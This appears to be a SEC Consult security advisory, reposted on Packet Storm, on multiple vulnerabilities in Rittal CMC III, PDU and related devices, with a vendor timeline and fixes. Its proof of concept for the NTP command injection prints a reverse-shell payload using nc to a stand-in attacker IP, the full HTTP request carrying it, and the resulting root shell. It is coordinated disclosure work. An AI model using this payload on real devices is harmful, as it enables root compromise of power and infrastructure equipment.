what you don't know can hurt you

Rittal Products Bypass / Command Injection / Privilege Escalation

Rittal Products Bypass / Command Injection / Privilege Escalation
Posted Jul 10, 2020
Authored by Johannes Kruchem, C. Svoboda | Site sec-consult.com

Multiple Rittal Products based on the same software suffer from CLI menu bypass, insecure configuration, hard-coded backdoor account, outdated component, command injection, and privilege escalation vulnerabilities. Products include but are not limited to CMC III PU Compact, CMC III PU 7030.000 PDU (whole portfolio), LCP-CW, and IoT Interface 3124.300.

tags | exploit, vulnerability
advisories | CVE-2020-11951, CVE-2020-11952, CVE-2020-11953, CVE-2020-11955, CVE-2020-11956
MD5 | 5e04df5718d707c3b3f9da0c2c4fb014

Rittal Products Bypass / Command Injection / Privilege Escalation

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20200708-0 >
=======================================================================
title: Multiple Critical Vulnerabilities
product: Multiple Rittal Products based on same software, e.g.
CMC III PU Compact, CMC III PU 7030.000
PDU (whole portfolio),
LCP-CW, IoT Interface 3124.300
vulnerable version: various, see affected versions below
fixed version: various, see solution versions below
CVE number: CVE-2020-11951, CVE-2020-11952, CVE-2020-11953, CVE-2020-11955, CVE-2020-11956
impact: critical
homepage: https://www.rittal.com
found: 2019-12
by: J. Kruchem (Office Vienna)
C. Svoboda
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Since its foundation in 1961, Rittal has continuously evolved into
the world's leading systems provider for enclosures, power distribution,
climate control, IT infrastructure and software & services.
Today, "Rittal - The System." offers you a perfectly coordinated system
platform. It unites innovative productions, pioneering engineering
solutions and global service to accommodate the most diverse
requirements. It caters to a whole host of industries, from machinery
and plant engineering, to the automotive industry, through to
information technology. All from a single source, all in top quality."

Source: https://www.rittal.com/com-en/content/en/unternehmen/portr_t/unternehmenspr_sentation/Unternehmenspr_sentation.jsp


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately, except for the PDU.
There is no date for a patch for the PDU until now and it is unclear
if it will be updated ever since a new PDU product will be released.
SEC Consult recommends to perform a thorough security review conducted
by security professionals to identify and resolve potential further
critical security issues.


Vulnerability overview/description:
-----------------------------------
The tested devices consist of several critical vulnerabilities.

1) CLI Menu Bypass (CVE-2020-11952)
When connecting via SSH to the PDU/CMC III devices one can configure the devices
via a CLI menu. It is easily possible to bypass this menu and break out to the
shell on the device. An attacker is then able to access the whole filesystem with
the corresponding user accounts used for SSH login and conduct further attacks.

2) Insecure Configuration of System Files (/etc/shadow & /etc/passwd) (CVE-2020-11955)
Critical OS files such as /etc/shadow and /etc/passwd are configured in an
insecure way. Everybody has full read, write and executable rights for these
two files. Therefore, every user who has authenticated / low privileged access to
the device could elevate the privileges up to root rights by just manipulating the
shadow file.

3) Hard-Coded Root Backdoor Account (CVE-2020-11951) & Weak Password Storage Algorithm
The root user account that exists on both PDU and CMC III devices, have the
identical password hash within the shadow file. This indicates that once an
attacker knows the password, the attacker would have access to several Rittal
devices with the highest possible user rights. The root user including the
password is not documented publicly. Furthermore, the MD5 hashing algorithm is
being used for storing password hashes within the /etc/shadow file.

4) Outdated Software Components
The tested devices have several outdated software versions with publicly known
vulnerabilities installed. The devices use outdated OpenSSL, Linux kernel and other
software components.

The outdated versions can also be identified by automatic firmware analysis tools such
as IoT Inspector.

5) Command Injection (CVE-2020-11953) / Privilege Escalation
The NTP server setting from the web interface of the PDU and CMC III is vulnerable to
a trivial command injection vulnerability when changing the IP address settings.
The command gets executed as root on the device while the attacker only has to be logged
on as pdu or admin user.

Info: Fixed in later versions (PDU: V5.15.40/CMC III: V3.15.70_4)
This vulnerability is mentioned in this advisory because devices, such as the PDU, are
not updated regularly since critical servers are often attached to these PDUs.
The vulnerability has been fixed by the vendor in the current firmware releases.

6) Webserver Started as Root (CVE-2020-11956)
The webserver runs as root which does not apply to the least privilege principle.
Thus, a command injection vulnerability in the webserver would lead to a privilege
escalation to root of the whole device.


Proof of concept:
-----------------
1 - 4
No PoC because no fix is in prospect to date.

5) Command Injection / Privilege Escalation
To exploit the command injection in the NTP configuration perform the following steps (PDU).
As a proof of concept, a reverse shell is being started:
a) Visit the web interface of either PDU or CMC III and login with default
credentials pdu or admin [PIC1]
b) Go to "Settings" -> Date/Time [PIC2]
c) Enter an NTP Server (it is enforced via JavaScript to only enter numbers and dots)
and intercept the request with a web proxy such as Burp.
d) Start an nc listener on the attacker's machine: e.g.
$ nc -lvp 9999
e) Click "save" and modify the request and add the following proof of concept for
the IP address:
$(nc <attacker-ip>:9999 -e /bin/sh)
The nc syntax may vary depending on the firmware and device.

Note: The commands are being run as root!

The request would look similar to the following:

POST /cgi-bin/json.cgi HTTP/1.1
Host: $deviceIP
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 238
Connection: close
Cookie: SaveStateCookie=pu

setConfig={"sessionId":1556766739,"configs":[{"option":500,"value":27},{"option":502,"value":"12:58:44"},{"option":503,"value":"10.12.2019"},{"option":504,"value":1},
{"option":505,"value":"xyz $(nc $attackerIP:9999 -e /bin/sh)"},{"option":506,"value":"0.0.0.0"}]}

f) Receive the connection and be root:

$ nc -lvp 9999
listening on [any] 9999 ...
connect to [$IP] from
[$IP] 56274
#pwd
/
#whoami
Root

6) Webserver Started as Root
see 5.


Vulnerable / tested versions:
-----------------------------
The following two devices have been tested and found to be vulnerable:
*) CMC III PU Compact (CMCIII-PU-9333E0FB)
*) PDU 7955.211 (PDU-3C002DEC)

The already mentioned and the following products share the same base firmware and
are affected as well according to Rittal:
*) CMC III PU 7030.000 (V3.15.70_4)
*) LCP-CW (V3.15.70_4)
*) whole PDU device portfolio (V5.15.40_2)
*) IoT Interface 3124.300 (V6.17.00)


Vendor contact timeline:
------------------------
2020-01-21: Telephone conference with vendor & initial vulnerability discussion.
2020-01-24: Vendor provides access to platform for encrypted advisory transmission.
2020-01-30: Sent advisory to vendor.
2020-01-31: Vendor assured to provide feedback in February.
2020-02-19: Asked for status update.
2020-02-26: Vendor answered in detail about affected devices, firmware versions and
expected firmware release (April 2020 for CMC & LCP products).
2020-03-05: Providing updated advisory to the vendor, asking for timeline regarding PDU update.
2020-04-29: Asking for PDU update.
2020-05-25: Informing customer that advisory will be released without PoC, since no date for PDU update is within sight.
2020-06-30: PoCs removed for which no fix is available.
2020-07-08: Coordinated release of security advisory


Solution:
---------
The vendor provides patches or workarounds to their customers.

Updated CMC and LCP firmwares can be downloaded under the following link:
http://www.rittal.com/imf/none/3_1074/Rittal_7030000_Software_3_1074

No schedule for PDU-updates.

1) CLI Menu Bypass
This issue is fixed in firmware versions V_.17.10.

2) Insecure Configuration of System Files
This issue is fixed in firmware versions V_.15.70 or higher.

3) Hard-Coded Backdoor Root Account
The root account cannot be exploited/used according to Rittal.
Since the root password hash could not be cracked it was not possible to test if further exploitation is possible.

The weak password storage algorithm is fixed in firmware versions V_.15.70 or higher but
the passwords need to be changed once for each user in order to update the algorithm.

4) Outdated Software Components
The vendor updates the software components regularly with each patch. The most current
libraries will be included in firmware versions V_.17.10.

5) Command Injection / Privilege Escalation
To fix the command injection vulnerability in the NTP server update the
PDU to V5.15.40 (https://www.rittal.com/at-de/content/de/webspecial/softwareupdate_fuer_pdus.jsp)
or the CMC III to V3.15.70_4 (https://www.rittal.com/de_de/rimatrix-downloads/index.asp?kat=security&subk=70)

6) Webserver Started as Root
The vendor answered that this issue will be fixed in a future update, but no schedule is
available.

Version 3.15.70 can be downloaded under: http://www.rittal.com/imf/none/3_1074/Rittal_7030000_Software_3_1074

Workaround:
-----------

Restrict access to IoT devices strictly by following network segmentation and
configuration best practices & hardening guidelines provided by the vendor.


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF J. Kruchem / @2020


Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close